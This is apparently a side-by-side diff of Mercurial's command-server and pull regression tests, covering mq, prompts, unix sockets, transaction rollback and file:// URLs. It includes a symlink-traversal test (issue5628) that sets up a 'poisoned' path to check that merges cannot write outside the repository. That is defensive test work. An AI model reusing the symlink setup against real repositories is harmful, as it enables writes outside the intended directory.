519 *** runcommand phase -df tip
520 obsoleted 1 changesets
520 obsoleted 1 changesets
521 *** runcommand log --hidden
521 *** runcommand log --hidden
522 changeset: 1:731265503d86
522 changeset: 1:731265503d86
523 tag: tip
523 tag: tip
524 user: test
524 user: test
525 date: Thu Jan 01 00:00:00 1970 +0000
525 date: Thu Jan 01 00:00:00 1970 +0000
526 summary: .
526 summary: .
527
527
528 changeset: 0:eff892de26ec
528 changeset: 0:eff892de26ec
529 bookmark: bm1
529 bookmark: bm1
530 bookmark: bm2
530 bookmark: bm2
531 bookmark: bm3
531 bookmark: bm3
532 user: test
532 user: test
533 date: Thu Jan 01 00:00:00 1970 +0000
533 date: Thu Jan 01 00:00:00 1970 +0000
534 summary: 1
534 summary: 1
535
535
536 *** runcommand log
536 *** runcommand log
537 changeset: 0:eff892de26ec
537 changeset: 0:eff892de26ec
538 bookmark: bm1
538 bookmark: bm1
539 bookmark: bm2
539 bookmark: bm2
540 bookmark: bm3
540 bookmark: bm3
541 tag: tip
541 tag: tip
542 user: test
542 user: test
543 date: Thu Jan 01 00:00:00 1970 +0000
543 date: Thu Jan 01 00:00:00 1970 +0000
544 summary: 1
544 summary: 1
545
545
546
546
547 $ cat <<EOF >> .hg/hgrc
547 $ cat <<EOF >> .hg/hgrc
548 > [extensions]
548 > [extensions]
549 > mq =
549 > mq =
550 > EOF
550 > EOF
551
551
552 >>> import os
552 >>> import os
553 >>> from hgclient import readchannel, runcommand, check
553 >>> from hgclient import readchannel, runcommand, check
554 >>> @check
554 >>> @check
555 ... def mqoutsidechanges(server):
555 ... def mqoutsidechanges(server):
556 ... readchannel(server)
556 ... readchannel(server)
557 ...
557 ...
558 ... # load repo.mq
558 ... # load repo.mq
559 ... runcommand(server, ['qapplied'])
559 ... runcommand(server, ['qapplied'])
560 ... os.system('hg qnew 0.diff')
560 ... os.system('hg qnew 0.diff')
561 ... # repo.mq should be invalidated
561 ... # repo.mq should be invalidated
562 ... runcommand(server, ['qapplied'])
562 ... runcommand(server, ['qapplied'])
563 ...
563 ...
564 ... runcommand(server, ['qpop', '--all'])
564 ... runcommand(server, ['qpop', '--all'])
565 ... os.system('hg qqueue --create foo')
565 ... os.system('hg qqueue --create foo')
566 ... # repo.mq should be recreated to point to new queue
566 ... # repo.mq should be recreated to point to new queue
567 ... runcommand(server, ['qqueue', '--active'])
567 ... runcommand(server, ['qqueue', '--active'])
568 *** runcommand qapplied
568 *** runcommand qapplied
569 *** runcommand qapplied
569 *** runcommand qapplied
570 0.diff
570 0.diff
571 *** runcommand qpop --all
571 *** runcommand qpop --all
572 popping 0.diff
572 popping 0.diff
573 patch queue now empty
573 patch queue now empty
574 *** runcommand qqueue --active
574 *** runcommand qqueue --active
575 foo
575 foo
576
576
577 $ cat <<EOF > dbgui.py
577 $ cat <<EOF > dbgui.py
578 > import os, sys
578 > import os, sys
579 > from mercurial import commands, registrar
579 > from mercurial import commands, registrar
580 > cmdtable = {}
580 > cmdtable = {}
581 > command = registrar.command(cmdtable)
581 > command = registrar.command(cmdtable)
582 > @command(b"debuggetpass", norepo=True)
582 > @command(b"debuggetpass", norepo=True)
583 > def debuggetpass(ui):
583 > def debuggetpass(ui):
584 > ui.write("%s\\n" % ui.getpass())
584 > ui.write("%s\\n" % ui.getpass())
585 > @command(b"debugprompt", norepo=True)
585 > @command(b"debugprompt", norepo=True)
586 > def debugprompt(ui):
586 > def debugprompt(ui):
587 > ui.write("%s\\n" % ui.prompt("prompt:"))
587 > ui.write("%s\\n" % ui.prompt("prompt:"))
588 > @command(b"debugreadstdin", norepo=True)
588 > @command(b"debugreadstdin", norepo=True)
589 > def debugreadstdin(ui):
589 > def debugreadstdin(ui):
590 > ui.write("read: %r\n" % sys.stdin.read(1))
590 > ui.write("read: %r\n" % sys.stdin.read(1))
591 > @command(b"debugwritestdout", norepo=True)
591 > @command(b"debugwritestdout", norepo=True)
592 > def debugwritestdout(ui):
592 > def debugwritestdout(ui):
593 > os.write(1, "low-level stdout fd and\n")
593 > os.write(1, "low-level stdout fd and\n")
594 > sys.stdout.write("stdout should be redirected to /dev/null\n")
594 > sys.stdout.write("stdout should be redirected to /dev/null\n")
595 > sys.stdout.flush()
595 > sys.stdout.flush()
596 > EOF
596 > EOF
597 $ cat <<EOF >> .hg/hgrc
597 $ cat <<EOF >> .hg/hgrc
598 > [extensions]
598 > [extensions]
599 > dbgui = dbgui.py
599 > dbgui = dbgui.py
600 > EOF
600 > EOF
601
601
602 >>> from hgclient import readchannel, runcommand, check, stringio
602 >>> from hgclient import readchannel, runcommand, check, stringio
603 >>> @check
603 >>> @check
604 ... def getpass(server):
604 ... def getpass(server):
605 ... readchannel(server)
605 ... readchannel(server)
606 ... runcommand(server, ['debuggetpass', '--config',
606 ... runcommand(server, ['debuggetpass', '--config',
607 ... 'ui.interactive=True'],
607 ... 'ui.interactive=True'],
608 ... input=stringio('1234\n'))
608 ... input=stringio('1234\n'))
609 ... runcommand(server, ['debuggetpass', '--config',
609 ... runcommand(server, ['debuggetpass', '--config',
610 ... 'ui.interactive=True'],
610 ... 'ui.interactive=True'],
611 ... input=stringio('\n'))
611 ... input=stringio('\n'))
612 ... runcommand(server, ['debuggetpass', '--config',
612 ... runcommand(server, ['debuggetpass', '--config',
613 ... 'ui.interactive=True'],
613 ... 'ui.interactive=True'],
614 ... input=stringio(''))
614 ... input=stringio(''))
615 ... runcommand(server, ['debugprompt', '--config',
615 ... runcommand(server, ['debugprompt', '--config',
616 ... 'ui.interactive=True'],
616 ... 'ui.interactive=True'],
617 ... input=stringio('5678\n'))
617 ... input=stringio('5678\n'))
618 ... runcommand(server, ['debugreadstdin'])
618 ... runcommand(server, ['debugreadstdin'])
619 ... runcommand(server, ['debugwritestdout'])
619 ... runcommand(server, ['debugwritestdout'])
620 *** runcommand debuggetpass --config ui.interactive=True
620 *** runcommand debuggetpass --config ui.interactive=True
621 password: 1234
621 password: 1234
622 *** runcommand debuggetpass --config ui.interactive=True
622 *** runcommand debuggetpass --config ui.interactive=True
623 password:
623 password:
624 *** runcommand debuggetpass --config ui.interactive=True
624 *** runcommand debuggetpass --config ui.interactive=True
625 password: abort: response expected
625 password: abort: response expected
626 [255]
626 [255]
627 *** runcommand debugprompt --config ui.interactive=True
627 *** runcommand debugprompt --config ui.interactive=True
628 prompt: 5678
628 prompt: 5678
629 *** runcommand debugreadstdin
629 *** runcommand debugreadstdin
630 read: ''
630 read: ''
631 *** runcommand debugwritestdout
631 *** runcommand debugwritestdout
632
632
633
633
634 run commandserver in commandserver, which is silly but should work:
634 run commandserver in commandserver, which is silly but should work:
635
635
636 >>> from __future__ import print_function
636 >>> from __future__ import print_function
637 >>> from hgclient import readchannel, runcommand, check, stringio
637 >>> from hgclient import readchannel, runcommand, check, stringio
638 >>> @check
638 >>> @check
639 ... def nested(server):
639 ... def nested(server):
640 ... print('%c, %r' % readchannel(server))
640 ... print('%c, %r' % readchannel(server))
641 ... class nestedserver(object):
641 ... class nestedserver(object):
642 ... stdin = stringio('getencoding\n')
642 ... stdin = stringio('getencoding\n')
643 ... stdout = stringio()
643 ... stdout = stringio()
644 ... runcommand(server, ['serve', '--cmdserver', 'pipe'],
644 ... runcommand(server, ['serve', '--cmdserver', 'pipe'],
645 ... output=nestedserver.stdout, input=nestedserver.stdin)
645 ... output=nestedserver.stdout, input=nestedserver.stdin)
646 ... nestedserver.stdout.seek(0)
646 ... nestedserver.stdout.seek(0)
647 ... print('%c, %r' % readchannel(nestedserver)) # hello
647 ... print('%c, %r' % readchannel(nestedserver)) # hello
648 ... print('%c, %r' % readchannel(nestedserver)) # getencoding
648 ... print('%c, %r' % readchannel(nestedserver)) # getencoding
649 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
649 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
650 *** runcommand serve --cmdserver pipe
650 *** runcommand serve --cmdserver pipe
651 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
651 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
652 r, '*' (glob)
652 r, '*' (glob)
653
653
654
654
655 start without repository:
655 start without repository:
656
656
657 $ cd ..
657 $ cd ..
658
658
659 >>> from __future__ import print_function
659 >>> from __future__ import print_function
660 >>> from hgclient import readchannel, runcommand, check
660 >>> from hgclient import readchannel, runcommand, check
661 >>> @check
661 >>> @check
662 ... def hellomessage(server):
662 ... def hellomessage(server):
663 ... ch, data = readchannel(server)
663 ... ch, data = readchannel(server)
664 ... print('%c, %r' % (ch, data))
664 ... print('%c, %r' % (ch, data))
665 ... # run an arbitrary command to make sure the next thing the server
665 ... # run an arbitrary command to make sure the next thing the server
666 ... # sends isn't part of the hello message
666 ... # sends isn't part of the hello message
667 ... runcommand(server, ['id'])
667 ... runcommand(server, ['id'])
668 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
668 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
669 *** runcommand id
669 *** runcommand id
670 abort: there is no Mercurial repository here (.hg not found)
670 abort: there is no Mercurial repository here (.hg not found)
671 [255]
671 [255]
672
672
673 >>> from hgclient import readchannel, runcommand, check
673 >>> from hgclient import readchannel, runcommand, check
674 >>> @check
674 >>> @check
675 ... def startwithoutrepo(server):
675 ... def startwithoutrepo(server):
676 ... readchannel(server)
676 ... readchannel(server)
677 ... runcommand(server, ['init', 'repo2'])
677 ... runcommand(server, ['init', 'repo2'])
678 ... runcommand(server, ['id', '-R', 'repo2'])
678 ... runcommand(server, ['id', '-R', 'repo2'])
679 *** runcommand init repo2
679 *** runcommand init repo2
680 *** runcommand id -R repo2
680 *** runcommand id -R repo2
681 000000000000 tip
681 000000000000 tip
682
682
683
683
684 don't fall back to cwd if invalid -R path is specified (issue4805):
684 don't fall back to cwd if invalid -R path is specified (issue4805):
685
685
686 $ cd repo
686 $ cd repo
687 $ hg serve --cmdserver pipe -R ../nonexistent
687 $ hg serve --cmdserver pipe -R ../nonexistent
688 abort: repository ../nonexistent not found!
688 abort: repository ../nonexistent not found!
689 [255]
689 [255]
690 $ cd ..
690 $ cd ..
691
691
692
692
693 unix domain socket:
693 unix domain socket:
694
694
695 $ cd repo
695 $ cd repo
696 $ hg update -q
696 $ hg update -q
697
697
698 #if unix-socket unix-permissions
698 #if unix-socket unix-permissions
699
699
700 >>> from __future__ import print_function
700 >>> from __future__ import print_function
701 >>> from hgclient import unixserver, readchannel, runcommand, check, stringio
701 >>> from hgclient import unixserver, readchannel, runcommand, check, stringio
702 >>> server = unixserver('.hg/server.sock', '.hg/server.log')
702 >>> server = unixserver('.hg/server.sock', '.hg/server.log')
703 >>> def hellomessage(conn):
703 >>> def hellomessage(conn):
704 ... ch, data = readchannel(conn)
704 ... ch, data = readchannel(conn)
705 ... print('%c, %r' % (ch, data))
705 ... print('%c, %r' % (ch, data))
706 ... runcommand(conn, ['id'])
706 ... runcommand(conn, ['id'])
707 >>> check(hellomessage, server.connect)
707 >>> check(hellomessage, server.connect)
708 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
708 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
709 *** runcommand id
709 *** runcommand id
710 eff892de26ec tip bm1/bm2/bm3
710 eff892de26ec tip bm1/bm2/bm3
711 >>> def unknowncommand(conn):
711 >>> def unknowncommand(conn):
712 ... readchannel(conn)
712 ... readchannel(conn)
713 ... conn.stdin.write('unknowncommand\n')
713 ... conn.stdin.write('unknowncommand\n')
714 >>> check(unknowncommand, server.connect) # error sent to server.log
714 >>> check(unknowncommand, server.connect) # error sent to server.log
715 >>> def serverinput(conn):
715 >>> def serverinput(conn):
716 ... readchannel(conn)
716 ... readchannel(conn)
717 ... patch = """
717 ... patch = """
718 ... # HG changeset patch
718 ... # HG changeset patch
719 ... # User test
719 ... # User test
720 ... # Date 0 0
720 ... # Date 0 0
721 ... 2
721 ... 2
722 ...
722 ...
723 ... diff -r eff892de26ec -r 1ed24be7e7a0 a
723 ... diff -r eff892de26ec -r 1ed24be7e7a0 a
724 ... --- a/a
724 ... --- a/a
725 ... +++ b/a
725 ... +++ b/a
726 ... @@ -1,1 +1,2 @@
726 ... @@ -1,1 +1,2 @@
727 ... 1
727 ... 1
728 ... +2
728 ... +2
729 ... """
729 ... """
730 ... runcommand(conn, ['import', '-'], input=stringio(patch))
730 ... runcommand(conn, ['import', '-'], input=stringio(patch))
731 ... runcommand(conn, ['log', '-rtip', '-q'])
731 ... runcommand(conn, ['log', '-rtip', '-q'])
732 >>> check(serverinput, server.connect)
732 >>> check(serverinput, server.connect)
733 *** runcommand import -
733 *** runcommand import -
734 applying patch from stdin
734 applying patch from stdin
735 *** runcommand log -rtip -q
735 *** runcommand log -rtip -q
736 2:1ed24be7e7a0
736 2:1ed24be7e7a0
737 >>> server.shutdown()
737 >>> server.shutdown()
738
738
739 $ cat .hg/server.log
739 $ cat .hg/server.log
740 listening at .hg/server.sock
740 listening at .hg/server.sock
741 abort: unknown command unknowncommand
741 abort: unknown command unknowncommand
742 killed!
742 killed!
743 $ rm .hg/server.log
743 $ rm .hg/server.log
744
744
745 if server crashed before hello, traceback will be sent to 'e' channel as
745 if server crashed before hello, traceback will be sent to 'e' channel as
746 last ditch:
746 last ditch:
747
747
748 $ cat <<EOF >> .hg/hgrc
748 $ cat <<EOF >> .hg/hgrc
749 > [cmdserver]
749 > [cmdserver]
750 > log = inexistent/path.log
750 > log = inexistent/path.log
751 > EOF
751 > EOF
752 >>> from __future__ import print_function
752 >>> from __future__ import print_function
753 >>> from hgclient import unixserver, readchannel, check
753 >>> from hgclient import unixserver, readchannel, check
754 >>> server = unixserver('.hg/server.sock', '.hg/server.log')
754 >>> server = unixserver('.hg/server.sock', '.hg/server.log')
755 >>> def earlycrash(conn):
755 >>> def earlycrash(conn):
756 ... while True:
756 ... while True:
757 ... try:
757 ... try:
758 ... ch, data = readchannel(conn)
758 ... ch, data = readchannel(conn)
759 ... if not data.startswith(' '):
759 ... if not data.startswith(' '):
760 ... print('%c, %r' % (ch, data))
760 ... print('%c, %r' % (ch, data))
761 ... except EOFError:
761 ... except EOFError:
762 ... break
762 ... break
763 >>> check(earlycrash, server.connect)
763 >>> check(earlycrash, server.connect)
764 e, 'Traceback (most recent call last):\n'
764 e, 'Traceback (most recent call last):\n'
765 e, "IOError: *" (glob)
765 e, "IOError: *" (glob)
766 >>> server.shutdown()
766 >>> server.shutdown()
767
767
768 $ cat .hg/server.log | grep -v '^ '
768 $ cat .hg/server.log | grep -v '^ '
769 listening at .hg/server.sock
769 listening at .hg/server.sock
770 Traceback (most recent call last):
770 Traceback (most recent call last):
771 IOError: * (glob)
771 IOError: * (glob)
772 killed!
772 killed!
773 #endif
773 #endif
774 #if no-unix-socket
774 #if no-unix-socket
775
775
776 $ hg serve --cmdserver unix -a .hg/server.sock
776 $ hg serve --cmdserver unix -a .hg/server.sock
777 abort: unsupported platform
777 abort: unsupported platform
778 [255]
778 [255]
779
779
780 #endif
780 #endif
781
781
782 $ cd ..
782 $ cd ..
783
783
784 Test that accessing to invalid changelog cache is avoided at
784 Test that accessing to invalid changelog cache is avoided at
785 subsequent operations even if repo object is reused even after failure
785 subsequent operations even if repo object is reused even after failure
786 of transaction (see 0a7610758c42 also)
786 of transaction (see 0a7610758c42 also)
787
787
788 "hg log" after failure of transaction is needed to detect invalid
788 "hg log" after failure of transaction is needed to detect invalid
789 cache in repoview: this can't detect by "hg verify" only.
789 cache in repoview: this can't detect by "hg verify" only.
790
790
791 Combination of "finalization" and "empty-ness of changelog" (2 x 2 =
791 Combination of "finalization" and "empty-ness of changelog" (2 x 2 =
792 4) are tested, because '00changelog.i' are differently changed in each
792 4) are tested, because '00changelog.i' are differently changed in each
793 cases.
793 cases.
794
794
795 $ cat > $TESTTMP/failafterfinalize.py <<EOF
795 $ cat > $TESTTMP/failafterfinalize.py <<EOF
796 > # extension to abort transaction after finalization forcibly
796 > # extension to abort transaction after finalization forcibly
797 > from mercurial import commands, error, extensions, lock as lockmod
797 > from mercurial import commands, error, extensions, lock as lockmod
798 > def fail(tr):
798 > def fail(tr):
799 > raise error.Abort('fail after finalization')
799 > raise error.Abort('fail after finalization')
800 > def reposetup(ui, repo):
800 > def reposetup(ui, repo):
801 > class failrepo(repo.__class__):
801 > class failrepo(repo.__class__):
802 > def commitctx(self, ctx, error=False):
802 > def commitctx(self, ctx, error=False):
803 > if self.ui.configbool('failafterfinalize', 'fail'):
803 > if self.ui.configbool('failafterfinalize', 'fail'):
804 > # 'sorted()' by ASCII code on category names causes
804 > # 'sorted()' by ASCII code on category names causes
805 > # invoking 'fail' after finalization of changelog
805 > # invoking 'fail' after finalization of changelog
806 > # using "'cl-%i' % id(self)" as category name
806 > # using "'cl-%i' % id(self)" as category name
807 > self.currenttransaction().addfinalize('zzzzzzzz', fail)
807 > self.currenttransaction().addfinalize('zzzzzzzz', fail)
808 > return super(failrepo, self).commitctx(ctx, error)
808 > return super(failrepo, self).commitctx(ctx, error)
809 > repo.__class__ = failrepo
809 > repo.__class__ = failrepo
810 > EOF
810 > EOF
811
811
812 $ hg init repo3
812 $ hg init repo3
813 $ cd repo3
813 $ cd repo3
814
814
815 $ cat <<EOF >> $HGRCPATH
815 $ cat <<EOF >> $HGRCPATH
816 > [ui]
816 > [ui]
817 > logtemplate = {rev} {desc|firstline} ({files})\n
817 > logtemplate = {rev} {desc|firstline} ({files})\n
818 >
818 >
819 > [extensions]
819 > [extensions]
820 > failafterfinalize = $TESTTMP/failafterfinalize.py
820 > failafterfinalize = $TESTTMP/failafterfinalize.py
821 > EOF
821 > EOF
822
822
823 - test failure with "empty changelog"
823 - test failure with "empty changelog"
824
824
825 $ echo foo > foo
825 $ echo foo > foo
826 $ hg add foo
826 $ hg add foo
827
827
828 (failure before finalization)
828 (failure before finalization)
829
829
830 >>> from hgclient import readchannel, runcommand, check
830 >>> from hgclient import readchannel, runcommand, check
831 >>> @check
831 >>> @check
832 ... def abort(server):
832 ... def abort(server):
833 ... readchannel(server)
833 ... readchannel(server)
834 ... runcommand(server, ['commit',
834 ... runcommand(server, ['commit',
835 ... '--config', 'hooks.pretxncommit=false',
835 ... '--config', 'hooks.pretxncommit=false',
836 ... '-mfoo'])
836 ... '-mfoo'])
837 ... runcommand(server, ['log'])
837 ... runcommand(server, ['log'])
838 ... runcommand(server, ['verify', '-q'])
838 ... runcommand(server, ['verify', '-q'])
839 *** runcommand commit --config hooks.pretxncommit=false -mfoo
839 *** runcommand commit --config hooks.pretxncommit=false -mfoo
840 transaction abort!
840 transaction abort!
841 rollback completed
841 rollback completed
842 abort: pretxncommit hook exited with status 1
842 abort: pretxncommit hook exited with status 1
843 [255]
843 [255]
844 *** runcommand log
844 *** runcommand log
845 *** runcommand verify -q
845 *** runcommand verify -q
846
846
847 (failure after finalization)
847 (failure after finalization)
848
848
849 >>> from hgclient import readchannel, runcommand, check
849 >>> from hgclient import readchannel, runcommand, check
850 >>> @check
850 >>> @check
851 ... def abort(server):
851 ... def abort(server):
852 ... readchannel(server)
852 ... readchannel(server)
853 ... runcommand(server, ['commit',
853 ... runcommand(server, ['commit',
854 ... '--config', 'failafterfinalize.fail=true',
854 ... '--config', 'failafterfinalize.fail=true',
855 ... '-mfoo'])
855 ... '-mfoo'])
856 ... runcommand(server, ['log'])
856 ... runcommand(server, ['log'])
857 ... runcommand(server, ['verify', '-q'])
857 ... runcommand(server, ['verify', '-q'])
858 *** runcommand commit --config failafterfinalize.fail=true -mfoo
858 *** runcommand commit --config failafterfinalize.fail=true -mfoo
859 transaction abort!
859 transaction abort!
860 rollback completed
860 rollback completed
861 abort: fail after finalization
861 abort: fail after finalization
862 [255]
862 [255]
863 *** runcommand log
863 *** runcommand log
864 *** runcommand verify -q
864 *** runcommand verify -q
865
865
866 - test failure with "not-empty changelog"
866 - test failure with "not-empty changelog"
867
867
868 $ echo bar > bar
868 $ echo bar > bar
869 $ hg add bar
869 $ hg add bar
870 $ hg commit -mbar bar
870 $ hg commit -mbar bar
871
871
872 (failure before finalization)
872 (failure before finalization)
873
873
874 >>> from hgclient import readchannel, runcommand, check
874 >>> from hgclient import readchannel, runcommand, check
875 >>> @check
875 >>> @check
876 ... def abort(server):
876 ... def abort(server):
877 ... readchannel(server)
877 ... readchannel(server)
878 ... runcommand(server, ['commit',
878 ... runcommand(server, ['commit',
879 ... '--config', 'hooks.pretxncommit=false',
879 ... '--config', 'hooks.pretxncommit=false',
880 ... '-mfoo', 'foo'])
880 ... '-mfoo', 'foo'])
881 ... runcommand(server, ['log'])
881 ... runcommand(server, ['log'])
882 ... runcommand(server, ['verify', '-q'])
882 ... runcommand(server, ['verify', '-q'])
883 *** runcommand commit --config hooks.pretxncommit=false -mfoo foo
883 *** runcommand commit --config hooks.pretxncommit=false -mfoo foo
884 transaction abort!
884 transaction abort!
885 rollback completed
885 rollback completed
886 abort: pretxncommit hook exited with status 1
886 abort: pretxncommit hook exited with status 1
887 [255]
887 [255]
888 *** runcommand log
888 *** runcommand log
889 0 bar (bar)
889 0 bar (bar)
890 *** runcommand verify -q
890 *** runcommand verify -q
891
891
892 (failure after finalization)
892 (failure after finalization)
893
893
894 >>> from hgclient import readchannel, runcommand, check
894 >>> from hgclient import readchannel, runcommand, check
895 >>> @check
895 >>> @check
896 ... def abort(server):
896 ... def abort(server):
897 ... readchannel(server)
897 ... readchannel(server)
898 ... runcommand(server, ['commit',
898 ... runcommand(server, ['commit',
899 ... '--config', 'failafterfinalize.fail=true',
899 ... '--config', 'failafterfinalize.fail=true',
900 ... '-mfoo', 'foo'])
900 ... '-mfoo', 'foo'])
901 ... runcommand(server, ['log'])
901 ... runcommand(server, ['log'])
902 ... runcommand(server, ['verify', '-q'])
902 ... runcommand(server, ['verify', '-q'])
903 *** runcommand commit --config failafterfinalize.fail=true -mfoo foo
903 *** runcommand commit --config failafterfinalize.fail=true -mfoo foo
904 transaction abort!
904 transaction abort!
905 rollback completed
905 rollback completed
906 abort: fail after finalization
906 abort: fail after finalization
907 [255]
907 [255]
908 *** runcommand log
908 *** runcommand log
909 0 bar (bar)
909 0 bar (bar)
910 *** runcommand verify -q
910 *** runcommand verify -q
911
912 $ cd ..
913
914 Test symlink traversal over cached audited paths:
915 -------------------------------------------------
916
917 #if symlink
918
919 set up symlink hell
920
921 $ mkdir merge-symlink-out
922 $ hg init merge-symlink
923 $ cd merge-symlink
924 $ touch base
925 $ hg commit -qAm base
926 $ ln -s ../merge-symlink-out a
927 $ hg commit -qAm 'symlink a -> ../merge-symlink-out'
928 $ hg up -q 0
929 $ mkdir a
930 $ touch a/poisoned
931 $ hg commit -qAm 'file a/poisoned'
932 $ hg log -G -T '{rev}: {desc}\n'
933 @ 2: file a/poisoned
934 |
935 | o 1: symlink a -> ../merge-symlink-out
936 |/
937 o 0: base
938
939
940 try trivial merge after update: cache of audited paths should be discarded,
941 and the merge should fail (issue5628)
942
943 $ hg up -q null
944 >>> from hgclient import readchannel, runcommand, check
945 >>> @check
946 ... def merge(server):
947 ... readchannel(server)
948 ... # audit a/poisoned as a good path
949 ... runcommand(server, ['up', '-qC', '2'])
950 ... runcommand(server, ['up', '-qC', '1'])
951 ... # here a is a symlink, so a/poisoned is bad
952 ... runcommand(server, ['merge', '2'])
953 *** runcommand up -qC 2
954 *** runcommand up -qC 1
955 *** runcommand merge 2
956 abort: path 'a/poisoned' traverses symbolic link 'a'
957 [255]
958 $ ls ../merge-symlink-out
959
960 cache of repo.auditor should be discarded, so matcher would never traverse
961 symlinks:
962
963 $ hg up -qC 0
964 $ touch ../merge-symlink-out/poisoned
965 >>> from hgclient import readchannel, runcommand, check
966 >>> @check
967 ... def files(server):
968 ... readchannel(server)
969 ... runcommand(server, ['up', '-qC', '2'])
970 ... # audit a/poisoned as a good path
971 ... runcommand(server, ['files', 'a/poisoned'])
972 ... runcommand(server, ['up', '-qC', '0'])
973 ... runcommand(server, ['up', '-qC', '1'])
974 ... # here 'a' is a symlink, so a/poisoned should be warned
975 ... runcommand(server, ['files', 'a/poisoned'])
976 *** runcommand up -qC 2
977 *** runcommand files a/poisoned
978 a/poisoned
979 *** runcommand up -qC 0
980 *** runcommand up -qC 1
981 *** runcommand files a/poisoned
982 abort: path 'a/poisoned' traverses symbolic link 'a'
983 [255]
984
985 $ cd ..
986
987 #endif
@@ -1,108 +1,134 b''
1 #require serve
1 #require serve
2
2
3 $ hg init test
3 $ hg init test
4 $ cd test
4 $ cd test
5
5
6 $ echo foo>foo
6 $ echo foo>foo
7 $ hg addremove
7 $ hg addremove
8 adding foo
8 adding foo
9 $ hg commit -m 1
9 $ hg commit -m 1
10
10
11 $ hg verify
11 $ hg verify
12 checking changesets
12 checking changesets
13 checking manifests
13 checking manifests
14 crosschecking files in changesets and manifests
14 crosschecking files in changesets and manifests
15 checking files
15 checking files
16 1 files, 1 changesets, 1 total revisions
16 1 files, 1 changesets, 1 total revisions
17
17
18 $ hg serve -p $HGPORT -d --pid-file=hg.pid
18 $ hg serve -p $HGPORT -d --pid-file=hg.pid
19 $ cat hg.pid >> $DAEMON_PIDS
19 $ cat hg.pid >> $DAEMON_PIDS
20 $ cd ..
20 $ cd ..
21
21
22 $ hg clone --pull http://foo:bar@localhost:$HGPORT/ copy
22 $ hg clone --pull http://foo:bar@localhost:$HGPORT/ copy
23 requesting all changes
23 requesting all changes
24 adding changesets
24 adding changesets
25 adding manifests
25 adding manifests
26 adding file changes
26 adding file changes
27 added 1 changesets with 1 changes to 1 files
27 added 1 changesets with 1 changes to 1 files
28 updating to branch default
28 updating to branch default
29 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
29 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
30
30
31 $ cd copy
31 $ cd copy
32 $ hg verify
32 $ hg verify
33 checking changesets
33 checking changesets
34 checking manifests
34 checking manifests
35 crosschecking files in changesets and manifests
35 crosschecking files in changesets and manifests
36 checking files
36 checking files
37 1 files, 1 changesets, 1 total revisions
37 1 files, 1 changesets, 1 total revisions
38
38
39 $ hg co
39 $ hg co
40 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
40 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
41 $ cat foo
41 $ cat foo
42 foo
42 foo
43
43
44 $ hg manifest --debug
44 $ hg manifest --debug
45 2ed2a3912a0b24502043eae84ee4b279c18b90dd 644 foo
45 2ed2a3912a0b24502043eae84ee4b279c18b90dd 644 foo
46
46
47 $ hg pull
47 $ hg pull
48 pulling from http://foo@localhost:$HGPORT/
48 pulling from http://foo@localhost:$HGPORT/
49 searching for changes
49 searching for changes
50 no changes found
50 no changes found
51
51
52 $ hg rollback --dry-run --verbose
52 $ hg rollback --dry-run --verbose
53 repository tip rolled back to revision -1 (undo pull: http://foo:***@localhost:$HGPORT/)
53 repository tip rolled back to revision -1 (undo pull: http://foo:***@localhost:$HGPORT/)
54
54
55 Test pull of non-existing 20 character revision specification, making sure plain ascii identifiers
55 Test pull of non-existing 20 character revision specification, making sure plain ascii identifiers
56 not are encoded like a node:
56 not are encoded like a node:
57
57
58 $ hg pull -r 'xxxxxxxxxxxxxxxxxxxy'
58 $ hg pull -r 'xxxxxxxxxxxxxxxxxxxy'
59 pulling from http://foo@localhost:$HGPORT/
59 pulling from http://foo@localhost:$HGPORT/
60 abort: unknown revision 'xxxxxxxxxxxxxxxxxxxy'!
60 abort: unknown revision 'xxxxxxxxxxxxxxxxxxxy'!
61 [255]
61 [255]
62 $ hg pull -r 'xxxxxxxxxxxxxxxxxx y'
62 $ hg pull -r 'xxxxxxxxxxxxxxxxxx y'
63 pulling from http://foo@localhost:$HGPORT/
63 pulling from http://foo@localhost:$HGPORT/
64 abort: unknown revision '7878787878787878787878787878787878782079'!
64 abort: unknown revision '7878787878787878787878787878787878782079'!
65 [255]
65 [255]
66
66
67 Issue622: hg init && hg pull -u URL doesn't checkout default branch
67 Issue622: hg init && hg pull -u URL doesn't checkout default branch
68
68
69 $ cd ..
69 $ cd ..
70 $ hg init empty
70 $ hg init empty
71 $ cd empty
71 $ cd empty
72 $ hg pull -u ../test
72 $ hg pull -u ../test
73 pulling from ../test
73 pulling from ../test
74 requesting all changes
74 requesting all changes
75 adding changesets
75 adding changesets
76 adding manifests
76 adding manifests
77 adding file changes
77 adding file changes
78 added 1 changesets with 1 changes to 1 files
78 added 1 changesets with 1 changes to 1 files
79 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
79 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
80
80
81 Test 'file:' uri handling:
81 Test 'file:' uri handling:
82
82
83 $ hg pull -q file://../test-does-not-exist
83 $ hg pull -q file://../test-does-not-exist
84 abort: file:// URLs can only refer to localhost
84 abort: file:// URLs can only refer to localhost
85 [255]
85 [255]
86
86
87 $ hg pull -q file://../test
87 $ hg pull -q file://../test
88 abort: file:// URLs can only refer to localhost
88 abort: file:// URLs can only refer to localhost
89 [255]
89 [255]
90
90
91 MSYS changes 'file:' into 'file;'
91 MSYS changes 'file:' into 'file;'
92
92
93 #if no-msys
93 #if no-msys
94 $ hg pull -q file:../test # no-msys
94 $ hg pull -q file:../test # no-msys
95 #endif
95 #endif
96
96
97 It's tricky to make file:// URLs working on every platform with
97 It's tricky to make file:// URLs working on every platform with
98 regular shell commands.
98 regular shell commands.
99
99
100 $ URL=`$PYTHON -c "import os; print 'file://foobar' + ('/' + os.getcwd().replace(os.sep, '/')).replace('//', '/') + '/../test'"`
100 $ URL=`$PYTHON -c "import os; print 'file://foobar' + ('/' + os.getcwd().replace(os.sep, '/')).replace('//', '/') + '/../test'"`
101 $ hg pull -q "$URL"
101 $ hg pull -q "$URL"
102 abort: file:// URLs can only refer to localhost
